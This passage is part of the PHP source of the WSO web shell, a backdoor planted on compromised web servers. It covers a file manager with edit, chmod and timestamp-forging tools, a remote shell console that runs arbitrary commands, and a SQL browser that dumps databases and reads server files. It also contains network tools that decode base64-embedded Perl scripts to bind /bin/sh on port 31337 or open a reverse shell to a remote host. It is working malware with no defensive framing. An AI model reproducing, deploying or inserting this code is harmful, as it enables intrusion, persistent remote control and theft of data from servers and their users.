573 | if(!file_exists($_POST['p1'])) { | |
574 | $fp = @fopen($_POST['p1'], 'w'); | |
575 | if($fp) { | |
576 | $_POST['p2'] = "edit"; | |
577 | fclose($fp); | |
578 | } | |
579 | } | |
580 | } | |
581 | wsoHeader(); | |
582 | echo '<h1>File tools</h1><div class=content>'; | |
583 | if( !file_exists(@$_POST['p1']) ) { | |
584 | echo 'File not exists'; | |
585 | wsoFooter(); | |
586 | return; | |
587 | } | |
588 | $uid = @posix_getpwuid(@fileowner($_POST['p1'])); | |
589 | if(!$uid) { | |
590 | $uid['name'] = @fileowner($_POST['p1']); | |
591 | $gid['name'] = @filegroup($_POST['p1']); | |
592 | } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); | |
593 | echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; | |
594 | echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; | |
595 | if( empty($_POST['p2']) ) | |
596 | $_POST['p2'] = 'view'; | |
597 | if( is_file($_POST['p1']) ) | |
598 | $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); | |
599 | else | |
600 | $m = array('Chmod', 'Rename', 'Touch'); | |
601 | foreach($m as $v) | |
602 | echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; | |
603 | echo '<br><br>'; | |
604 | switch($_POST['p2']) { | |
605 | case 'view': | |
606 | echo '<pre class=ml1>'; | |
607 | $fp = @fopen($_POST['p1'], 'r'); | |
608 | if($fp) { | |
609 | while( !@feof($fp) ) | |
610 | echo htmlspecialchars(@fread($fp, 1024)); | |
611 | @fclose($fp); | |
612 | } | |
613 | echo '</pre>'; | |
614 | break; | |
615 | case 'highlight': | |
616 | if( @is_readable($_POST['p1']) ) { | |
617 | echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; | |
618 | $code = @highlight_file($_POST['p1'],true); | |
619 | echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; | |
620 | } | |
621 | break; | |
622 | case 'chmod': | |
623 | if( !empty($_POST['p3']) ) { | |
624 | $perms = 0; | |
625 | for($i=strlen($_POST['p3'])-1;$i>=0;--$i) | |
626 | $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); | |
627 | if(!@chmod($_POST['p1'], $perms)) | |
628 | echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; | |
629 | } | |
630 | clearstatcache(); | |
631 | echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; | |
632 | break; | |
633 | case 'edit': | |
634 | if( !is_writable($_POST['p1'])) { | |
635 | echo 'File isn\'t writeable'; | |
636 | break; | |
637 | } | |
638 | if( !empty($_POST['p3']) ) { | |
639 | $time = @filemtime($_POST['p1']); | |
640 | $_POST['p3'] = substr($_POST['p3'],1); | |
641 | $fp = @fopen($_POST['p1'],"w"); | |
642 | if($fp) { | |
643 | @fwrite($fp,$_POST['p3']); | |
644 | @fclose($fp); | |
645 | echo 'Saved!<br><script>p3_="";</script>'; | |
646 | @touch($_POST['p1'],$time,$time); | |
647 | } | |
648 | } | |
649 | echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; | |
650 | $fp = @fopen($_POST['p1'], 'r'); | |
651 | if($fp) { | |
652 | while( !@feof($fp) ) | |
653 | echo htmlspecialchars(@fread($fp, 1024)); | |
654 | @fclose($fp); | |
655 | } | |
656 | echo '</textarea><input type=submit value=">>"></form>'; | |
657 | break; | |
658 | case 'hexdump': | |
659 | $c = @file_get_contents($_POST['p1']); | |
660 | $n = 0; | |
661 | $h = array('00000000<br>','',''); | |
662 | $len = strlen($c); | |
663 | for ($i=0; $i<$len; ++$i) { | |
664 | $h[1] .= sprintf('%02X',ord($c[$i])).' '; | |
665 | switch ( ord($c[$i]) ) { | |
666 | case 0: $h[2] .= ' '; break; | |
667 | case 9: $h[2] .= ' '; break; | |
668 | case 10: $h[2] .= ' '; break; | |
669 | case 13: $h[2] .= ' '; break; | |
670 | default: $h[2] .= $c[$i]; break; | |
671 | } | |
672 | $n++; | |
673 | if ($n == 32) { | |
674 | $n = 0; | |
675 | if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} | |
676 | $h[1] .= '<br>'; | |
677 | $h[2] .= "\n"; | |
678 | } | |
679 | } | |
680 | echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; | |
681 | break; | |
682 | case 'rename': | |
683 | if( !empty($_POST['p3']) ) { | |
684 | if(!@rename($_POST['p1'], $_POST['p3'])) | |
685 | echo 'Can\'t rename!<br>'; | |
686 | else | |
687 | die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); | |
688 | } | |
689 | echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; | |
690 | break; | |
691 | case 'touch': | |
692 | if( !empty($_POST['p3']) ) { | |
693 | $time = strtotime($_POST['p3']); | |
694 | if($time) { | |
695 | if(!touch($_POST['p1'],$time,$time)) | |
696 | echo 'Fail!'; | |
697 | else | |
698 | echo 'Touched!'; | |
699 | } else echo 'Bad time format!'; | |
700 | } | |
701 | clearstatcache(); | |
702 | echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; | |
703 | break; | |
704 | } | |
705 | echo '</div>'; | |
706 | wsoFooter(); | |
707 | } | |
708 | ||
709 | function actionConsole() { | |
710 | if(!empty($_POST['p1']) && !empty($_POST['p2'])) { | |
711 | $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true; | |
712 | $_POST['p1'] .= ' 2>&1'; | |
713 | } elseif(!empty($_POST['p1'])) | |
714 | $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false; | |
715 | ||
716 | if(isset($_POST['ajax'])) { | |
717 | $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; | |
718 | ob_start(); | |
719 | echo "d.cf.cmd.value='';\n"; | |
720 | $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0")); | |
721 | if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { | |
722 | if(@chdir($match[1])) { | |
723 | $GLOBALS['cwd'] = @getcwd(); | |
724 | echo "c_='".$GLOBALS['cwd']."';"; | |
725 | } | |
726 | } | |
727 | echo "d.cf.output.value+='".$temp."';"; | |
728 | echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; | |
729 | $temp = ob_get_clean(); | |
730 | echo strlen($temp), "\n", $temp; | |
731 | exit; | |
732 | } | |
733 | wsoHeader(); | |
734 | echo "<script> | |
735 | if(window.Event) window.captureEvents(Event.KEYDOWN); | |
736 | var cmds = new Array(''); | |
737 | var cur = 0; | |
738 | function kp(e) { | |
739 | var n = (window.Event) ? e.which : e.keyCode; | |
740 | if(n == 38) { | |
741 | cur--; | |
742 | if(cur>=0) | |
743 | document.cf.cmd.value = cmds[cur]; | |
744 | else | |
745 | cur++; | |
746 | } else if(n == 40) { | |
747 | cur++; | |
748 | if(cur < cmds.length) | |
749 | document.cf.cmd.value = cmds[cur]; | |
750 | else | |
751 | cur--; | |
752 | } | |
753 | } | |
754 | function add(cmd) { | |
755 | cmds.pop(); | |
756 | cmds.push(cmd); | |
757 | cmds.push(''); | |
758 | cur = cmds.length-1; | |
759 | } | |
760 | ||
761 | </script>"; | |
762 | echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;">'; | |
763 | ||
764 | if(empty($_POST['ajax'])&&!empty($_POST['p1'])) | |
765 | $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; | |
766 | echo '</select><nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; | |
767 | if(!empty($_POST['p1'])) { | |
768 | echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1'])); | |
769 | } | |
770 | echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; | |
771 | echo '</form></div><script>d.cf.cmd.focus();</script>'; | |
772 | wsoFooter(); | |
773 | } | |
774 | ||
775 | function actionSql() { | |
776 | class DbClass { | |
777 | var $type; | |
778 | var $link; | |
779 | var $res; | |
780 | function DbClass($type) { | |
781 | $this->type = $type; | |
782 | } | |
783 | function connect($host, $user, $pass, $dbname){ | |
784 | switch($this->type) { | |
785 | case 'mysql': | |
786 | if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; | |
787 | break; | |
788 | case 'pgsql': | |
789 | $host = explode(':', $host); | |
790 | if(!$host[1]) $host[1]=5432; | |
791 | if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; | |
792 | break; | |
793 | } | |
794 | return false; | |
795 | } | |
796 | function selectdb($db) { | |
797 | switch($this->type) { | |
798 | case 'mysql': | |
799 | if (@mysql_select_db($db))return true; | |
800 | break; | |
801 | } | |
802 | return false; | |
803 | } | |
804 | function query($str) { | |
805 | switch($this->type) { | |
806 | case 'mysql': | |
807 | return $this->res = @mysql_query($str); | |
808 | break; | |
809 | case 'pgsql': | |
810 | return $this->res = @pg_query($this->link,$str); | |
811 | break; | |
812 | } | |
813 | return false; | |
814 | } | |
815 | function fetch() { | |
816 | $res = func_num_args()?func_get_arg(0):$this->res; | |
817 | switch($this->type) { | |
818 | case 'mysql': | |
819 | return @mysql_fetch_assoc($res); | |
820 | break; | |
821 | case 'pgsql': | |
822 | return @pg_fetch_assoc($res); | |
823 | break; | |
824 | } | |
825 | return false; | |
826 | } | |
827 | function listDbs() { | |
828 | switch($this->type) { | |
829 | case 'mysql': | |
830 | return $this->query("SHOW databases"); | |
831 | break; | |
832 | case 'pgsql': | |
833 | return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); | |
834 | break; | |
835 | } | |
836 | return false; | |
837 | } | |
838 | function listTables() { | |
839 | switch($this->type) { | |
840 | case 'mysql': | |
841 | return $this->res = $this->query('SHOW TABLES'); | |
842 | break; | |
843 | case 'pgsql': | |
844 | return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); | |
845 | break; | |
846 | } | |
847 | return false; | |
848 | } | |
849 | function error() { | |
850 | switch($this->type) { | |
851 | case 'mysql': | |
852 | return @mysql_error(); | |
853 | break; | |
854 | case 'pgsql': | |
855 | return @pg_last_error(); | |
856 | break; | |
857 | } | |
858 | return false; | |
859 | } | |
860 | function setCharset($str) { | |
861 | switch($this->type) { | |
862 | case 'mysql': | |
863 | if(function_exists('mysql_set_charset')) | |
864 | return @mysql_set_charset($str, $this->link); | |
865 | else | |
866 | $this->query('SET CHARSET '.$str); | |
867 | break; | |
868 | case 'pgsql': | |
869 | return @pg_set_client_encoding($this->link, $str); | |
870 | break; | |
871 | } | |
872 | return false; | |
873 | } | |
874 | function loadFile($str) { | |
875 | switch($this->type) { | |
876 | case 'mysql': | |
877 | return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); | |
878 | break; | |
879 | case 'pgsql': | |
880 | $this->query("CREATE TABLE wso1(file text);COPY wso1 FROM '".addslashes($str)."';select file from wso1;"); | |
881 | $r=array(); | |
882 | while($i=$this->fetch()) | |
883 | $r[] = $i['file']; | |
884 | $this->query('drop table wso1'); | |
885 | return array('file'=>implode("\n",$r)); | |
886 | break; | |
887 | } | |
888 | return false; | |
889 | } | |
890 | function dump($table, $fp = false) { | |
891 | switch($this->type) { | |
892 | case 'mysql': | |
893 | $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); | |
894 | $create = mysql_fetch_array($res); | |
895 | $sql = $create[1].";\n"; | |
896 | if($fp) fwrite($fp, $sql); else echo($sql); | |
897 | $this->query('SELECT * FROM `'.$table.'`'); | |
898 | $head = true; | |
899 | while($item = $this->fetch()) { | |
900 | $columns = array(); | |
901 | foreach($item as $k=>$v) { | |
902 | if($v == null) | |
903 | $item[$k] = "NULL"; | |
904 | elseif(is_numeric($v)) | |
905 | $item[$k] = $v; | |
906 | else | |
907 | $item[$k] = "'".@mysql_real_escape_string($v)."'"; | |
908 | $columns[] = "`".$k."`"; | |
909 | } | |
910 | if($head) { | |
911 | $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')'; | |
912 | $head = false; | |
913 | } else | |
914 | $sql = "\n\t,(".implode(", ", $item).')'; | |
915 | if($fp) fwrite($fp, $sql); else echo($sql); | |
916 | } | |
917 | if(!$head) | |
918 | if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); | |
919 | break; | |
920 | case 'pgsql': | |
921 | $this->query('SELECT * FROM '.$table); | |
922 | while($item = $this->fetch()) { | |
923 | $columns = array(); | |
924 | foreach($item as $k=>$v) { | |
925 | $item[$k] = "'".addslashes($v)."'"; | |
926 | $columns[] = $k; | |
927 | } | |
928 | $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; | |
929 | if($fp) fwrite($fp, $sql); else echo($sql); | |
930 | } | |
931 | break; | |
932 | } | |
933 | return false; | |
934 | } | |
935 | }; | |
936 | $db = new DbClass($_POST['type']); | |
937 | if(@$_POST['p2']=='download') { | |
938 | $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); | |
939 | $db->selectdb($_POST['sql_base']); | |
940 | switch($_POST['charset']) { | |
941 | case "Windows-1251": $db->setCharset('cp1251'); break; | |
942 | case "UTF-8": $db->setCharset('utf8'); break; | |
943 | case "KOI8-R": $db->setCharset('koi8r'); break; | |
944 | case "KOI8-U": $db->setCharset('koi8u'); break; | |
945 | case "cp866": $db->setCharset('cp866'); break; | |
946 | } | |
947 | if(empty($_POST['file'])) { | |
948 | ob_start("ob_gzhandler", 4096); | |
949 | header("Content-Disposition: attachment; filename=dump.sql"); | |
950 | header("Content-Type: text/plain"); | |
951 | foreach($_POST['tbl'] as $v) | |
952 | $db->dump($v); | |
953 | exit; | |
954 | } elseif($fp = @fopen($_POST['file'], 'w')) { | |
955 | foreach($_POST['tbl'] as $v) | |
956 | $db->dump($v, $fp); | |
957 | fclose($fp); | |
958 | unset($_POST['p2']); | |
959 | } else | |
960 | die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); | |
961 | } | |
962 | wsoHeader(); | |
963 | echo " | |
964 | ||
965 | <h1>Sql browser</h1><div class=content> | |
966 | <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> | |
967 | <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> | |
968 | <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'> | |
969 | <td><select name='type'><option value='mysql' "; | |
970 | if(@$_POST['type']=='mysql')echo 'selected'; | |
971 | echo ">MySql</option><option value='pgsql' "; | |
972 | if(@$_POST['type']=='pgsql')echo 'selected'; | |
973 | echo ">PostgreSql</option></select></td> | |
974 | <td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td> | |
975 | <td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td> | |
976 | <td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>"; | |
977 | $tmp = "<input type=text name=sql_base value=''>"; | |
978 | if(isset($_POST['sql_host'])){ | |
979 | if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { | |
980 | switch($_POST['charset']) { | |
981 | case "Windows-1251": $db->setCharset('cp1251'); break; | |
982 | case "UTF-8": $db->setCharset('utf8'); break; | |
983 | case "KOI8-R": $db->setCharset('koi8r'); break; | |
984 | case "KOI8-U": $db->setCharset('koi8u'); break; | |
985 | case "cp866": $db->setCharset('cp866'); break; | |
986 | } | |
987 | $db->listDbs(); | |
988 | echo "<select name=sql_base><option value=''></option>"; | |
989 | while($item = $db->fetch()) { | |
990 | list($key, $value) = each($item); | |
991 | echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; | |
992 | } | |
993 | echo '</select>'; | |
994 | } | |
995 | else echo $tmp; | |
996 | }else | |
997 | echo $tmp; | |
998 | echo "</td> | |
999 | ||
1000 | <td><input type=submit value='>>' onclick='fs(d.sf);'></td> | |
1001 | <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td> | |
1002 | </tr> | |
1003 | </table> | |
1004 | <script> | |
1005 | s_db='".@addslashes($_POST['sql_base'])."'; | |
1006 | function fs(f) { | |
1007 | if(f.sql_base.value!=s_db) { f.onsubmit = function() {}; | |
1008 | if(f.p1) f.p1.value=''; | |
1009 | if(f.p2) f.p2.value=''; | |
1010 | if(f.p3) f.p3.value=''; | |
1011 | } | |
1012 | } | |
1013 | function st(t,l) { | |
1014 | d.sf.p1.value = 'select'; | |
1015 | d.sf.p2.value = t; | |
1016 | if(l && d.sf.p3) d.sf.p3.value = l; | |
1017 | d.sf.submit(); | |
1018 | } | |
1019 | function is() { | |
1020 | for(i=0;i<d.sf.elements['tbl[]'].length;++i) | |
1021 | d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked; | |
1022 | } | |
1023 | </script>"; | |
1024 | if(isset($db) && $db->link){ | |
1025 | echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; | |
1026 | if(!empty($_POST['sql_base'])){ | |
1027 | $db->selectdb($_POST['sql_base']); | |
1028 | echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; | |
1029 | $tbls_res = $db->listTables(); | |
1030 | while($item = $db->fetch($tbls_res)) { | |
1031 | list($key, $value) = each($item); | |
1032 | if(!empty($_POST['sql_count'])) | |
1033 | $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); | |
1034 | $value = htmlspecialchars($value); | |
1035 | echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>"; | |
1036 | } | |
1037 | echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; | |
1038 | if(@$_POST['p1'] == 'select') { | |
1039 | $_POST['p1'] = 'query'; | |
1040 | $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; | |
1041 | $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); | |
1042 | $num = $db->fetch(); | |
1043 | $pages = ceil($num['n'] / 30); | |
1044 | echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">"; | |
1045 | echo " of $pages"; | |
1046 | if($_POST['p3'] > 1) | |
1047 | echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>"; | |
1048 | if($_POST['p3'] < $pages) | |
1049 | echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>"; | |
1050 | $_POST['p3']--; | |
1051 | if($_POST['type']=='pgsql') | |
1052 | $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); | |
1053 | else | |
1054 | $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; | |
1055 | echo "<br><br>"; | |
1056 | } | |
1057 | if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { | |
1058 | $db->query(@$_POST['p2']); | |
1059 | if($db->res !== false) { | |
1060 | $title = false; | |
1061 | echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">'; | |
1062 | $line = 1; | |
1063 | while($item = $db->fetch()) { | |
1064 | if(!$title) { | |
1065 | echo '<tr>'; | |
1066 | foreach($item as $key => $value) | |
1067 | echo '<th>'.$key.'</th>'; | |
1068 | reset($item); | |
1069 | $title=true; | |
1070 | echo '</tr><tr>'; | |
1071 | $line = 2; | |
1072 | } | |
1073 | echo '<tr class="l'.$line.'">'; | |
1074 | $line = $line==1?2:1; | |
1075 | foreach($item as $key => $value) { | |
1076 | if($value == null) | |
1077 | echo '<td><i>null</i></td>'; | |
1078 | else | |
1079 | echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; | |
1080 | } | |
1081 | echo '</tr>'; | |
1082 | } | |
1083 | echo '</table>'; | |
1084 | } else { | |
1085 | echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; | |
1086 | } | |
1087 | } | |
1088 | echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; | |
1089 | if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) | |
1090 | echo htmlspecialchars($_POST['p2']); | |
1091 | echo "</textarea><br/><input type=submit value='Execute'>"; | |
1092 | echo "</td></tr>"; | |
1093 | } | |
1094 | echo "</table></form><br/>"; | |
1095 | if($_POST['type']=='mysql') { | |
1096 | $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); | |
1097 | if($db->fetch()) | |
1098 | echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; | |
1099 | } | |
1100 | if(@$_POST['p1'] == 'loadfile') { | |
1101 | $file = $db->loadFile($_POST['p2']); | |
1102 | echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; | |
1103 | } | |
1104 | } else { | |
1105 | echo htmlspecialchars($db->error()); | |
1106 | } | |
1107 | echo '</div>'; | |
1108 | wsoFooter(); | |
1109 | } | |
1110 | function actionNetwork() { | |
1111 | wsoHeader(); | |
1112 | $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; | |
1113 | $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; | |
1114 | echo "<h1>Network tools</h1><div class=content> | |
1115 | ||
1116 | <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\"> | |
1117 | <span>Bind port to /bin/sh [perl]</span><br/> | |
1118 | Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> | |
1119 | </form> | |
1120 | <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"> | |
1121 | <span>Back-connect [perl]</span><br/> | |
1122 | Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> | |
1123 | ||
1124 | </form><br>"; | |
1125 | if(isset($_POST['p1'])) { | |
1126 | function cf($f,$t) { | |
1127 | $w = @fopen($f,"w") or @function_exists('file_put_contents'); | |
1128 | if($w){ | |
1129 | @fwrite($w,@base64_decode($t)); | |
1130 | @fclose($w); | |
1131 | } | |
1132 | } | |
1133 | if($_POST['p1'] == 'bpp') { | |
1134 | cf("/tmp/bp.pl",$bind_port_p); | |
1135 | $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &"); | |
1136 | echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>"; | |
1137 | unlink("/tmp/bp.pl"); | |
1138 | } | |
1139 | if($_POST['p1'] == 'bcp') { | |
1140 | cf("/tmp/bc.pl",$back_connect_p); | |
1141 | $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &"); | |
1142 | echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>"; | |
1143 | unlink("/tmp/bc.pl"); | |
1144 | } | |
1145 | } | |
1146 | echo '</div>'; | |
1147 | wsoFooter(); | |
1148 | } | |
1149 | ||
1150 | if( empty($_POST['a']) ) | |
1151 | if(isset($default_action) && function_exists('action' . $default_action)) | |
1152 | $_POST['a'] = $default_action; | |
1153 | else | |
1154 | $_POST['a'] = 'SecInfo'; | |
1155 | if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) | |
1156 | call_user_func('action' . $_POST['a']); | |
1157 | exit; | |
1158 | ?> |